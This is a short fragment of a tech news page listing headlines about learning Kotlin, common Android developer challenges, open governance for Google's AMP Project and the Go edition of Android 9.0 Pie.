Learning Kotlin by building Android Applications. 6 common challenges faced by Android App developers Google plans to let the AMP Project have an open governance model, soon! Entry level phones to taste the Go edition of the Android 9.0 Pie version
Read more
  • 0
  • 0
  • 7129